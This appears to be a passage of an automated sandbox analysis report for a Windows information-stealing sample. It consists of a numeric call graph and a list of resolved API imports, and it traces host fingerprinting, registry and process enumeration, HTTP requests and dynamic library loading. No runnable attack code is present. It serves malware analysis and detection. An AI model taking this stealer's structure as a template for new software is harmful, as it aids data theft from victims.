lstrlen 15035 d85ebe 15034->15035 15036 d85ed7 lstrlen 15035->15036 15037 d85ee7 15036->15037 15038 d85ef0 lstrlen 15037->15038 15039 d85f04 15038->15039 15040 d85f1a lstrlen 15039->15040 15828 d9aad0 15040->15828 15042 d85f2a HttpSendRequestA 15043 d85f35 InternetReadFile 15042->15043 15044 d85f6a InternetCloseHandle 15043->15044 15048 d85f61 15043->15048 15044->14969 15046 d9a9b0 4 API calls 15046->15048 15047 d9a8a0 lstrcpy 15047->15048 15048->15043 15048->15044 15048->15046 15048->15047 15051 d91077 15049->15051 15050 d91151 15050->13820 15051->15050 15052 d9a820 lstrlen lstrcpy 15051->15052 15052->15051 15058 d90db7 15053->15058 15054 d90f17 15054->13828 15055 d90ea4 StrCmpCA 15055->15058 15056 d90e27 StrCmpCA 15056->15058 15057 d90e67 StrCmpCA 15057->15058 15058->15054 15058->15055 15058->15056 15058->15057 15059 d9a820 lstrlen lstrcpy 15058->15059 15059->15058 15064 d90f67 15060->15064 15061 d91044 15061->13836 15062 d90fb2 StrCmpCA 15062->15064 15063 d9a820 lstrlen lstrcpy 15063->15064 15064->15061 15064->15062 15064->15063 15066 d9a740 lstrcpy 15065->15066 15067 d91a26 15066->15067 15068 d9a9b0 4 API calls 15067->15068 15069 d91a37 15068->15069 15070 d9a8a0 lstrcpy 15069->15070 15071 d91a40 15070->15071 15072 d9a9b0 4 API calls 15071->15072 15073 d91a5b 15072->15073 15074 d9a8a0 lstrcpy 15073->15074 15075 d91a64 15074->15075 15076 d9a9b0 4 API calls 15075->15076 15077 d91a7d 15076->15077 15078 d9a8a0 lstrcpy 15077->15078 15079 d91a86 15078->15079 15080 d9a9b0 4 API calls 15079->15080 15081 d91aa1 15080->15081 15082 d9a8a0 lstrcpy 15081->15082 15083 d91aaa 15082->15083 15084 d9a9b0 4 API calls 15083->15084 15085 d91ac3 15084->15085 15086 d9a8a0 lstrcpy 15085->15086 15087 d91acc 15086->15087 15088 d9a9b0 4 API calls 15087->15088 15089 d91ae7 15088->15089 15090 d9a8a0 lstrcpy 15089->15090 15091 d91af0 15090->15091 15092 d9a9b0 4 API calls 15091->15092 15093 d91b09 15092->15093 15094 d9a8a0 lstrcpy 15093->15094 15095 d91b12 15094->15095 15096 d9a9b0 4 API calls 15095->15096 15097 d91b2d 15096->15097 15098 d9a8a0 lstrcpy 15097->15098 15099 d91b36 15098->15099 15100 d9a9b0 4 API calls 15099->15100 15101 d91b4f 15100->15101 15102 d9a8a0 lstrcpy 15101->15102 15103 d91b58 15102->15103 15104 d9a9b0 4 API calls 15103->15104 15105 d91b76 15104->15105 15106 d9a8a0 lstrcpy 15105->15106 15107 d91b7f 15106->15107 15108 d97500 6 API calls 15107->15108 15109 d91b96 15108->15109 15110 d9a920 3 API calls 15109->15110 15111 d91ba9 15110->15111 15112 d9a8a0 lstrcpy 15111->15112 15113 d91bb2 15112->15113 15114 d9a9b0 4 API calls 15113->15114 15115 d91bdc 15114->15115 15116 d9a8a0 lstrcpy 15115->15116 15117 d91be5 15116->15117 15118 d9a9b0 4 API calls 15117->15118 15119 d91c05 15118->15119 15120 d9a8a0 lstrcpy 15119->15120 15121 d91c0e 15120->15121 15829 d97690 GetProcessHeap RtlAllocateHeap 15121->15829 15124 d9a9b0 4 API calls 15125 d91c2e 15124->15125 15126 d9a8a0 lstrcpy 15125->15126 15127 d91c37 15126->15127 15128 d9a9b0 4 API calls 15127->15128 15129 d91c56 15128->15129 15130 d9a8a0 lstrcpy 15129->15130 15131 d91c5f 15130->15131 15132 d9a9b0 4 API calls 15131->15132 15133 d91c80 15132->15133 15134 d9a8a0 lstrcpy 15133->15134 15135 d91c89 15134->15135 15836 d977c0 GetCurrentProcess IsWow64Process 15135->15836 15138 d9a9b0 4 API calls 15139 d91ca9 15138->15139 15140 d9a8a0 lstrcpy 15139->15140 15141 d91cb2 15140->15141 15142 d9a9b0 4 API calls 15141->15142 15143 d91cd1 15142->15143 15144 d9a8a0 lstrcpy 15143->15144 15145 d91cda 15144->15145 15146 d9a9b0 4 API calls 15145->15146 15147 d91cfb 15146->15147 15148 d9a8a0 lstrcpy 15147->15148 15149 d91d04 15148->15149 15150 d97850 3 API calls 15149->15150 15151 d91d14 15150->15151 15152 d9a9b0 4 API calls 15151->15152 15153 d91d24 15152->15153 15154 d9a8a0 lstrcpy 15153->15154 15155 d91d2d 15154->15155 15156 d9a9b0 4 API calls 15155->15156 15157 d91d4c 15156->15157 15158 d9a8a0 lstrcpy 15157->15158 15159 d91d55 15158->15159 15160 d9a9b0 4 API calls 15159->15160 15161 d91d75 15160->15161 15162 d9a8a0 lstrcpy 15161->15162 15163 d91d7e 15162->15163 15164 d978e0 3 API calls 15163->15164 15165 d91d8e 15164->15165 15166 d9a9b0 4 API calls 15165->15166 15167 d91d9e 15166->15167 15168 d9a8a0 lstrcpy 15167->15168 15169 d91da7 15168->15169 15170 d9a9b0 4 API calls 15169->15170 15171 d91dc6 15170->15171 15172 d9a8a0 lstrcpy 15171->15172 15173 d91dcf 15172->15173 15174 d9a9b0 4 API calls 15173->15174 15175 d91df0 15174->15175 15176 d9a8a0 lstrcpy 15175->15176 15177 d91df9 15176->15177 15838 d97980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15177->15838 15180 d9a9b0 4 API calls 15181 d91e19 15180->15181 15182 d9a8a0 lstrcpy 15181->15182 15183 d91e22 15182->15183 15184 d9a9b0 4 API calls 15183->15184 15185 d91e41 15184->15185 15186 d9a8a0 lstrcpy 15185->15186 15187 d91e4a 15186->15187 15188 d9a9b0 4 API calls 15187->15188 15189 d91e6b 15188->15189 15190 d9a8a0 lstrcpy 15189->15190 15191 d91e74 15190->15191 15840 d97a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15191->15840 15194 d9a9b0 4 API calls 15195 d91e94 15194->15195 15196 d9a8a0 lstrcpy 15195->15196 15197 d91e9d 15196->15197 15198 d9a9b0 4 API calls 15197->15198 15199 d91ebc 15198->15199 15200 d9a8a0 lstrcpy 15199->15200 15201 d91ec5 15200->15201 15202 d9a9b0 4 API calls 15201->15202 15203 d91ee5 15202->15203 15204 d9a8a0 lstrcpy 15203->15204 15205 d91eee 15204->15205 15843 d97b00 GetUserDefaultLocaleName 15205->15843 15208 d9a9b0 4 API calls 15209 d91f0e 15208->15209 15210 d9a8a0 lstrcpy 15209->15210 15211 d91f17 15210->15211 15212 d9a9b0 4 API calls 15211->15212 15213 d91f36 15212->15213 15214 d9a8a0 lstrcpy 15213->15214 15215 d91f3f 15214->15215 15216 d9a9b0 4 API calls 15215->15216 15217 d91f60 15216->15217 15218 d9a8a0 lstrcpy 15217->15218 15219 d91f69 15218->15219 15847 d97b90 15219->15847 15221 d91f80 15222 d9a920 3 API calls 15221->15222 15223 d91f93 15222->15223 15224 d9a8a0 lstrcpy 15223->15224 15225 d91f9c 15224->15225 15226 d9a9b0 4 API calls 15225->15226 15227 d91fc6 15226->15227 15228 d9a8a0 lstrcpy 15227->15228 15229 d91fcf 15228->15229 15230 d9a9b0 4 API calls 15229->15230 15231 d91fef 15230->15231 15232 d9a8a0 lstrcpy 15231->15232 15233 d91ff8 15232->15233 15859 d97d80 GetSystemPowerStatus 15233->15859 15236 d9a9b0 4 API calls 15237 d92018 15236->15237 15238 d9a8a0 lstrcpy 15237->15238 15239 d92021 15238->15239 15240 d9a9b0 4 API calls 15239->15240 15241 d92040 15240->15241 15242 d9a8a0 lstrcpy 15241->15242 15243 d92049 15242->15243 15244 d9a9b0 4 API calls 15243->15244 15245 d9206a 15244->15245 15246 d9a8a0 lstrcpy 15245->15246 15247 d92073 15246->15247 15248 d9207e GetCurrentProcessId 15247->15248 15861 d99470 OpenProcess 15248->15861 15251 d9a920 3 API calls 15252 d920a4 15251->15252 15253 d9a8a0 lstrcpy 15252->15253 15254 d920ad 15253->15254 15255 d9a9b0 4 API calls 15254->15255 15256 d920d7 15255->15256 15257 d9a8a0 lstrcpy 15256->15257 15258 d920e0 15257->15258 15259 d9a9b0 4 API calls 15258->15259 15260 d92100 15259->15260 15261 d9a8a0 lstrcpy 15260->15261 15262 d92109 15261->15262 15866 d97e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15262->15866 15265 d9a9b0 4 API calls 15266 d92129 15265->15266 15267 d9a8a0 lstrcpy 15266->15267 15268 d92132 15267->15268 15269 d9a9b0 4 API calls 15268->15269 15270 d92151 15269->15270 15271 d9a8a0 lstrcpy 15270->15271 15272 d9215a 15271->15272 15273 d9a9b0 4 API calls 15272->15273 15274 d9217b 15273->15274 15275 d9a8a0 lstrcpy 15274->15275 15276 d92184 15275->15276 15870 d97f60 15276->15870 15279 d9a9b0 4 API calls 15280 d921a4 15279->15280 15281 d9a8a0 lstrcpy 15280->15281 15282 d921ad 15281->15282 15283 d9a9b0 4 API calls 15282->15283 15284 d921cc 15283->15284 15285 d9a8a0 lstrcpy 15284->15285 15286 d921d5 15285->15286 15287 d9a9b0 4 API calls 15286->15287 15288 d921f6 15287->15288 15289 d9a8a0 lstrcpy 15288->15289 15290 d921ff 15289->15290 15883 d97ed0 GetSystemInfo wsprintfA 15290->15883 15293 d9a9b0 4 API calls 15294 d9221f 15293->15294 15295 d9a8a0 lstrcpy 15294->15295 15296 d92228 15295->15296 15297 d9a9b0 4 API calls 15296->15297 15298 d92247 15297->15298 15299 d9a8a0 lstrcpy 15298->15299 15300 d92250 15299->15300 15301 d9a9b0 4 API calls 15300->15301 15302 d92270 15301->15302 15303 d9a8a0 lstrcpy 15302->15303 15304 d92279 15303->15304 15885 d98100 GetProcessHeap RtlAllocateHeap 15304->15885 15307 d9a9b0 4 API calls 15308 d92299 15307->15308 15309 d9a8a0 lstrcpy 15308->15309 15310 d922a2 15309->15310 15311 d9a9b0 4 API calls 15310->15311 15312 d922c1 15311->15312 15313 d9a8a0 lstrcpy 15312->15313 15314 d922ca 15313->15314 15315 d9a9b0 4 API calls 15314->15315 15316 d922eb 15315->15316 15317 d9a8a0 lstrcpy 15316->15317 15318 d922f4 15317->15318 15891 d987c0 15318->15891 15321 d9a920 3 API calls 15322 d9231e 15321->15322 15323 d9a8a0 lstrcpy 15322->15323 15324 d92327 15323->15324 15325 d9a9b0 4 API calls 15324->15325 15326 d92351 15325->15326 15327 d9a8a0 lstrcpy 15326->15327 15328 d9235a 15327->15328 15329 d9a9b0 4 API calls 15328->15329 15330 d9237a 15329->15330 15331 d9a8a0 lstrcpy 15330->15331 15332 d92383 15331->15332 15333 d9a9b0 4 API calls 15332->15333 15334 d923a2 15333->15334 15335 d9a8a0 lstrcpy 15334->15335 15336 d923ab 15335->15336 15896 d981f0 15336->15896 15338 d923c2 15339 d9a920 3 API calls 15338->15339 15340 d923d5 15339->15340 15341 d9a8a0 lstrcpy 15340->15341 15342 d923de 15341->15342 15343 d9a9b0 4 API calls 15342->15343 15344 d9240a 15343->15344 15345 d9a8a0 lstrcpy 15344->15345 15346 d92413 15345->15346 15347 d9a9b0 4 API calls 15346->15347 15348 d92432 15347->15348 15349 d9a8a0 lstrcpy 15348->15349 15350 d9243b 15349->15350 15351 d9a9b0 4 API calls 15350->15351 15352 d9245c 15351->15352 15353 d9a8a0 lstrcpy 15352->15353 15354 d92465 15353->15354 15355 d9a9b0 4 API calls 15354->15355 15356 d92484 15355->15356 15357 d9a8a0 lstrcpy 15356->15357 15358 d9248d 15357->15358 15359 d9a9b0 4 API calls 15358->15359 15360 d924ae 15359->15360 15361 d9a8a0 lstrcpy 15360->15361 15362 d924b7 15361->15362 15904 d98320 15362->15904 15364 d924d3 15365 d9a920 3 API calls 15364->15365 15366 d924e6 15365->15366 15367 d9a8a0 lstrcpy 15366->15367 15368 d924ef 15367->15368 15369 d9a9b0 4 API calls 15368->15369 15370 d92519 15369->15370 15371 d9a8a0 lstrcpy 15370->15371 15372 d92522 15371->15372 15373 d9a9b0 4 API calls 15372->15373 15374 d92543 15373->15374 15375 d9a8a0 lstrcpy 15374->15375 15376 d9254c 15375->15376 15377 d98320 17 API calls 15376->15377 15378 d92568 15377->15378 15379 d9a920 3 API calls 15378->15379 15380 d9257b 15379->15380 15381 d9a8a0 lstrcpy 15380->15381 15382 d92584 15381->15382 15383 d9a9b0 4 API calls 15382->15383 15384 d925ae 15383->15384 15385 d9a8a0 lstrcpy 15384->15385 15386 d925b7 15385->15386 15387 d9a9b0 4 API calls 15386->15387 15388 d925d6 15387->15388 15389 d9a8a0 lstrcpy 15388->15389 15390 d925df 15389->15390 15391 d9a9b0 4 API calls 15390->15391 15392 d92600 15391->15392 15393 d9a8a0 lstrcpy 15392->15393 15394 d92609 15393->15394 15940 d98680 15394->15940 15396 d92620 15397 d9a920 3 API calls 15396->15397 15398 d92633 15397->15398 15399 d9a8a0 lstrcpy 15398->15399 15400 d9263c 15399->15400 15401 d9265a lstrlen 15400->15401 15402 d9266a 15401->15402 15403 d9a740 lstrcpy 15402->15403 15404 d9267c 15403->15404 15405 d81590 lstrcpy 15404->15405 15406 d9268d 15405->15406 15950 d95190 15406->15950 15408 d92699 15408->13840 16138 d9aad0 15409->16138 15411 d85009 InternetOpenUrlA 15415 d85021 15411->15415 15412 d8502a InternetReadFile 15412->15415 15413 d850a0 InternetCloseHandle InternetCloseHandle 15414 d850ec 15413->15414 15414->13844 15415->15412 15415->15413 16139 d898d0 15416->16139 15418 d90759 15419 d90a38 15418->15419 15420 d9077d 15418->15420 15421 d81590 lstrcpy 15419->15421 15423 d90799 StrCmpCA 15420->15423 15422 d90a49 15421->15422 16315 d90250 15422->16315 15425 d90843 15423->15425 15426 d907a8 15423->15426 15429 d90865 StrCmpCA 15425->15429 15428 d9a7a0 lstrcpy 15426->15428 15430 d907c3 15428->15430 15431 d90874 15429->15431 15468 d9096b 15429->15468 15432 d81590 lstrcpy 15430->15432 15433 d9a740 lstrcpy 15431->15433 15434 d9080c 15432->15434 15436 d90881 15433->15436 15437 d9a7a0 lstrcpy 15434->15437 15435 d9099c StrCmpCA 15438 d909ab 15435->15438 15439 d90a2d 15435->15439 15440 d9a9b0 4 API calls 15436->15440 15441 d90823 15437->15441 15443 d81590 lstrcpy 15438->15443 15439->13848 15444 d908ac 15440->15444 15442 d9a7a0 lstrcpy 15441->15442 15445 d9083e 15442->15445 15446 d909f4 15443->15446 15447 d9a920 3 API calls 15444->15447 16142 d8fb00 15445->16142 15449 d9a7a0 lstrcpy 15446->15449 15450 d908b3 15447->15450 15451 d90a0d 15449->15451 15452 d9a9b0 4 API calls 15450->15452 15453 d9a7a0 lstrcpy 15451->15453 15454 d908ba 15452->15454 15456 d90a28 15453->15456 16258 d90030 15456->16258 15468->15435 15790 d9a7a0 lstrcpy 15789->15790 15791 d81683 15790->15791 15792 d9a7a0 lstrcpy 15791->15792 15793 d81695 15792->15793 15794 d9a7a0 lstrcpy 15793->15794 15795 d816a7 15794->15795 15796 d9a7a0 lstrcpy 15795->15796 15797 d815a3 15796->15797 15797->14671 15799 d847c6 15798->15799 15800 d84838 lstrlen 15799->15800 15824 d9aad0 15800->15824 15802 d84848 InternetCrackUrlA 15803 d84867 15802->15803 15803->14748 15805 d9a740 lstrcpy 15804->15805 15806 d98b74 15805->15806 15807 d9a740 lstrcpy 15806->15807 15808 d98b82 GetSystemTime 15807->15808 15810 d98b99 15808->15810 15809 d9a7a0 lstrcpy 15811 d98bfc 15809->15811 15810->15809 15811->14763 15813 d9a931 15812->15813 15814 d9a988 15813->15814 15817 d9a968 lstrcpy lstrcat 15813->15817 15815 d9a7a0 lstrcpy 15814->15815 15816 d9a994 15815->15816 15816->14766 15817->15814 15818->14881 15820 d89af9 LocalAlloc 15819->15820 15821 d84eee 15819->15821 15820->15821 15822 d89b14 CryptStringToBinaryA 15820->15822 15821->14769 15821->14772 15822->15821 15823 d89b39 LocalFree 15822->15823 15823->15821 15824->15802 15825->14891 15826->15032 15827->15034 15828->15042 15957 d977a0 15829->15957 15832 d976c6 RegOpenKeyExA 15833 d97704 RegCloseKey 15832->15833 15834 d976e7 RegQueryValueExA 15832->15834 15835 d91c1e 15833->15835 15834->15833 15835->15124 15837 d91c99 15836->15837 15837->15138 15839 d91e09 15838->15839 15839->15180 15841 d97a9a wsprintfA 15840->15841 15842 d91e84 15840->15842 15841->15842 15842->15194 15844 d97b4d 15843->15844 15845 d91efe 15843->15845 15964 d98d20 LocalAlloc CharToOemW 15844->15964 15845->15208 15848 d9a740 lstrcpy 15847->15848 15849 d97bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15848->15849 15856 d97c25 15849->15856 15850 d97d18 15852 d97d28 15850->15852 15853 d97d1e LocalFree 15850->15853 15851 d97c46 GetLocaleInfoA 15851->15856 15855 d9a7a0 lstrcpy 15852->15855 15853->15852 15854 d9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15854->15856 15857 d97d37 15855->15857 15856->15850 15856->15851 15856->15854 15858 d9a8a0 lstrcpy 15856->15858 15857->15221 15858->15856 15860 d92008 15859->15860 15860->15236 15862 d99493 GetModuleFileNameExA CloseHandle 15861->15862 15863 d994b5 15861->15863 15862->15863 15864 d9a740 lstrcpy 15863->15864 15865 d92091 15864->15865 15865->15251 15867 d97e68 RegQueryValueExA 15866->15867 15868 d92119 15866->15868 15869 d97e8e RegCloseKey 15867->15869 15868->15265 15869->15868 15871 d97fb9 GetLogicalProcessorInformationEx 15870->15871 15872 d97fd8 GetLastError 15871->15872 15874 d98029 15871->15874 15873 d98022 15872->15873 15882 d97fe3 15872->15882 15876 d92194 15873->15876 15879 d989f0 2 API calls 15873->15879 15878 d989f0 2 API calls 15874->15878 15876->15279 15880 d9807b 15878->15880 15879->15876 15880->15873 15881 d98084 wsprintfA 15880->15881 15881->15876 15882->15871 15882->15876 15965 d989f0 15882->15965 15968 d98a10 GetProcessHeap RtlAllocateHeap 15882->15968 15884 d9220f 15883->15884 15884->15293 15886 d989b0 15885->15886 15887 d9814d GlobalMemoryStatusEx 15886->15887 15888 d98163 __aulldiv 15887->15888 15889 d9819b wsprintfA 15888->15889 15890 d92289 15889->15890 15890->15307 15892 d987fb GetProcessHeap RtlAllocateHeap wsprintfA 15891->15892 15894 d9a740 lstrcpy 15892->15894 15895 d9230b 15894->15895 15895->15321 15897 d9a740 lstrcpy 15896->15897 15901 d98229 15897->15901 15898 d98263 15900 d9a7a0 lstrcpy 15898->15900 15899 d9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15899->15901 15902 d982dc 15900->15902 15901->15898 15901->15899 15903 d9a8a0 lstrcpy 15901->15903 15902->15338 15903->15901 15905 d9a740 lstrcpy 15904->15905 15906 d9835c RegOpenKeyExA 15905->15906 15907 d983ae 15906->15907 15908 d983d0 15906->15908 15909 d9a7a0 lstrcpy 15907->15909 15910 d983f8 RegEnumKeyExA 15908->15910 15911 d98613 RegCloseKey 15908->15911 15917 d983bd 15909->15917 15912 d9843f wsprintfA RegOpenKeyExA 15910->15912 15913 d9860e 15910->15913 15914 d9a7a0 lstrcpy 15911->15914 15915 d984c1 RegQueryValueExA 15912->15915 15916 d98485 RegCloseKey RegCloseKey 15912->15916 15913->15911 15914->15917 15919 d984fa lstrlen 15915->15919 15920 d98601 RegCloseKey 15915->15920 15918 d9a7a0 lstrcpy 15916->15918 15917->15364 15918->15917 15919->15920 15921 d98510 15919->15921 15920->15913 15922 d9a9b0 4 API calls 15921->15922 15923 d98527 15922->15923 15924 d9a8a0 lstrcpy 15923->15924 15925 d98533 15924->15925 15926 d9a9b0 4 API calls 15925->15926 15927 d98557 15926->15927 15928 d9a8a0 lstrcpy 15927->15928 15929 d98563 15928->15929 15930 d9856e RegQueryValueExA 15929->15930 15930->15920 15931 d985a3 15930->15931 15932 d9a9b0 4 API calls 15931->15932 15933 d985ba 15932->15933 15934 d9a8a0 lstrcpy 15933->15934 15935 d985c6 15934->15935 15936 d9a9b0 4 API calls 15935->15936 15937 d985ea 15936->15937 15938 d9a8a0 lstrcpy 15937->15938 15939 d985f6 15938->15939 15939->15920 15941 d9a740 lstrcpy 15940->15941 15942 d986bc CreateToolhelp32Snapshot Process32First 15941->15942 15943 d986e8 Process32Next 15942->15943 15944 d9875d CloseHandle 15942->15944 15943->15944 15949 d986fd 15943->15949 15945 d9a7a0 lstrcpy 15944->15945 15948 d98776 15945->15948 15946 d9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15946->15949 15947 d9a8a0 lstrcpy 15947->15949 15948->15396 15949->15943 15949->15946 15949->15947 15951 d9a7a0 lstrcpy 15950->15951 15952 d951b5 15951->15952 15953 d81590 lstrcpy 15952->15953 15954 d951c6 15953->15954 15969 d85100 15954->15969 15956 d951cf 15956->15408 15960 d97720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15957->15960 15959 d976b9 15959->15832 15959->15835 15961 d97780 RegCloseKey 15960->15961 15962 d97765 RegQueryValueExA 15960->15962 15963 d97793 15961->15963 15962->15961 15963->15959 15964->15845 15966 d989f9 GetProcessHeap HeapFree 15965->15966 15967 d98a0c 15965->15967 15966->15967 15967->15882 15968->15882 15970 d9a7a0 lstrcpy 15969->15970 15971 d85119 15970->15971 15972 d847b0 2 API calls 15971->15972 15973 d85125 15972->15973 16129 d98ea0 15973->16129 15975 d85184 15976 d85192 lstrlen 15975->15976 15977 d851a5 15976->15977 15978 d98ea0 4 API calls 15977->15978 15979 d851b6 15978->15979 15980 d9a740 lstrcpy 15979->15980 15981 d851c9 15980->15981 15982 d9a740 lstrcpy 15981->15982 15983 d851d6 15982->15983 15984 d9a740 lstrcpy 15983->15984 15985 d851e3 15984->15985 15986 d9a740 lstrcpy 15985->15986 15987 d851f0 15986->15987 15988 d9a740 lstrcpy 15987->15988 15989 d851fd InternetOpenA StrCmpCA 15988->15989 15990 d8522f 15989->15990 15991 d858c4 InternetCloseHandle 15990->15991 15992 d98b60 3 API calls 15990->15992 15998 d858d9 ctype 15991->15998 15993 d8524e 15992->15993 15994 d9a920 3 API calls 15993->15994 15995 d85261 15994->15995 15996 d9a8a0 lstrcpy 15995->15996 15997 d8526a 15996->15997 15999 d9a9b0 4 API calls 15997->15999 16001 d9a7a0 lstrcpy 15998->16001 16000 d852ab 15999->16000 16002 d9a920 3 API calls 16000->16002 16010 d85913 16001->16010 16003 d852b2 16002->16003 16004 d9a9b0 4 API calls 16003->16004 16005 d852b9 16004->16005 16006 d9a8a0 lstrcpy 16005->16006 16007 d852c2 16006->16007 16008 d9a9b0 4 API calls 16007->16008 16009 d85303 16008->16009 16011 d9a920 3 API calls 16009->16011 16010->15956 16012 d8530a 16011->16012 16013 d9a8a0 lstrcpy 16012->16013 16014 d85313 16013->16014 16015 d85329 InternetConnectA 16014->16015 16015->15991 16016 d85359 HttpOpenRequestA 16015->16016 16018 d858b7 InternetCloseHandle 16016->16018 16019 d853b7 16016->16019 16018->15991 16020 d9a9b0 4 API calls 16019->16020 16021 d853cb 16020->16021 16022 d9a8a0 lstrcpy 16021->16022 16023 d853d4 16022->16023 16024 d9a920 3 API calls 16023->16024 16025 d853f2 16024->16025 16026 d9a8a0 lstrcpy 16025->16026 16027 d853fb 16026->16027 16028 d9a9b0 4 API calls 16027->16028 16029 d8541a 16028->16029 16030 d9a8a0 lstrcpy 16029->16030 16031 d85423 16030->16031 16032 d9a9b0 4 API calls 16031->16032 16033 d85444 16032->16033 16034 d9a8a0 lstrcpy 16033->16034 16035 d8544d 16034->16035 16036 d9a9b0 4 API calls 16035->16036 16037 d8546e 16036->16037 16038 d9a8a0 lstrcpy 16037->16038 16130 d98ead CryptBinaryToStringA 16129->16130 16134 d98ea9 16129->16134 16131 d98ece GetProcessHeap RtlAllocateHeap 16130->16131 16130->16134 16132 d98ef4 ctype 16131->16132 16131->16134 16133 d98f05 CryptBinaryToStringA 16132->16133 16133->16134 16134->15975 16138->15411 16381 d89880 16139->16381 16141 d898e1 16141->15418 16143 d9a740 lstrcpy 16142->16143 16316 d9a740 lstrcpy 16315->16316 16317 d90266 16316->16317 16318 d98de0 2 API calls 16317->16318 16319 d9027b 16318->16319 16320 d9a920 3 API calls 16319->16320 16321 d9028b 16320->16321 16322 d9a8a0 lstrcpy 16321->16322 16323 d90294 16322->16323 16324 d9a9b0 4 API calls 16323->16324 16325 d902b8 16324->16325 16382 d8988e 16381->16382 16385 d86fb0 16382->16385 16384 d898ad ctype 16384->16141 16388 d86d40 16385->16388 16389 d86d63 16388->16389 16396 d86d59 16388->16396 16389->16396 16402 d86660 16389->16402 16391 d86dbe 16391->16396 16408 d869b0 16391->16408 16393 d86e2a 16394 d86ee6 VirtualFree 16393->16394 16393->16396 16397 d86ef7 16393->16397 16394->16397 16395 d86f41 16395->16396 16398 d989f0 2 API calls 16395->16398 16396->16384 16397->16395 16399 d86f38 16397->16399 16400 d86f26 FreeLibrary 16397->16400 16398->16396 16401 d989f0 2 API calls 16399->16401 16400->16397 16401->16395 16407 d8668f VirtualAlloc 16402->16407 16404 d86730 16405 d86743 VirtualAlloc 16404->16405 16406 d8673c 16404->16406 16405->16406 16406->16391 16407->16404 16407->16406 16409 d869c9 16408->16409 16414 d869d5 16408->16414 16410 d86a09 LoadLibraryA 16409->16410 16409->16414 16411 d86a32 16410->16411 16410->16414 16417 d86ae0 16411->16417 16418 d98a10 GetProcessHeap RtlAllocateHeap 16411->16418 16413 d86ba8 GetProcAddress 16413->16414 16413->16417 16414->16393 16415 d989f0 2 API calls 16415->16417 16416 d86a8b 16416->16414 16416->16415 16417->16413 16417->16414 16418->16416 17885 123236e 17886 1232e7b VirtualProtect 17885->17886 17888 1232ebd 17886->17888

                                Executed Functions

                                Function 00D99860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 d99860-d99874 call d99750 663 d9987a-d99a8e call d99780 GetProcAddress * 21 660->663 664 d99a93-d99af2 LoadLibraryA * 5 660->664 663->664 665 d99b0d-d99b14 664->665 666 d99af4-d99b08 GetProcAddress 664->666 668 d99b46-d99b4d 665->668 669 d99b16-d99b41 GetProcAddress * 2 665->669 666->665 671 d99b68-d99b6f 668->671 672 d99b4f-d99b63 GetProcAddress 668->672 669->668 673 d99b89-d99b90 671->673 674 d99b71-d99b84 GetProcAddress 671->674 672->671 675 d99bc1-d99bc2 673->675 676 d99b92-d99bbc GetProcAddress * 2 673->676 674->673 676->675
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,018224A0), ref: 00D998A1
                                • GetProcAddress.KERNEL32(74DD0000,018224B8), ref: 00D998BA
                                • GetProcAddress.KERNEL32(74DD0000,018223B0), ref: 00D998D2
                                • GetProcAddress.KERNEL32(74DD0000,018224D0), ref: 00D998EA
                                • GetProcAddress.KERNEL32(74DD0000,01822350), ref: 00D99903
                                • GetProcAddress.KERNEL32(74DD0000,01829018), ref: 00D9991B
                                • GetProcAddress.KERNEL32(74DD0000,018158B0), ref: 00D99933
                                • GetProcAddress.KERNEL32(74DD0000,01815830), ref: 00D9994C
                                • GetProcAddress.KERNEL32(74DD0000,01822218), ref: 00D99964
                                • GetProcAddress.KERNEL32(74DD0000,01822308), ref: 00D9997C
                                • GetProcAddress.KERNEL32(74DD0000,01822500), ref: 00D99995
                                • GetProcAddress.KERNEL32(74DD0000,01822320), ref: 00D999AD
                                • GetProcAddress.KERNEL32(74DD0000,018158D0), ref: 00D999C5
                                • GetProcAddress.KERNEL32(74DD0000,01822230), ref: 00D999DE
                                • GetProcAddress.KERNEL32(74DD0000,018222C0), ref: 00D999F6
                                • GetProcAddress.KERNEL32(74DD0000,018156D0), ref: 00D99A0E
                                • GetProcAddress.KERNEL32(74DD0000,01822368), ref: 00D99A27
                                • GetProcAddress.KERNEL32(74DD0000,01822398), ref: 00D99A3F
                                • GetProcAddress.KERNEL32(74DD0000,01815870), ref: 00D99A57
                                • GetProcAddress.KERNEL32(74DD0000,018222D8), ref: 00D99A70
                                • GetProcAddress.KERNEL32(74DD0000,018158F0), ref: 00D99A88
                                • LoadLibraryA.KERNEL32(01822578,?,00D96A00), ref: 00D99A9A
                                • LoadLibraryA.KERNEL32(01822590,?,00D96A00), ref: 00D99AAB
                                • LoadLibraryA.KERNEL32(01822518,?,00D96A00), ref: 00D99ABD
                                • LoadLibraryA.KERNEL32(018225D8,?,00D96A00), ref: 00D99ACF
                                • LoadLibraryA.KERNEL32(018225A8,?,00D96A00), ref: 00D99AE0
                                • GetProcAddress.KERNEL32(75A70000,018225C0), ref: 00D99B02
                                • GetProcAddress.KERNEL32(75290000,01822530), ref: 00D99B23
                                • GetProcAddress.KERNEL32(75290000,01822548), ref: 00D99B3B
                                • GetProcAddress.KERNEL32(75BD0000,01822560), ref: 00D99B5D
                                • GetProcAddress.KERNEL32(75450000,01815710), ref: 00D99B7E
                                • GetProcAddress.KERNEL32(76E90000,018290D8), ref: 00D99B9F
                                • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00D99BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00D99BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
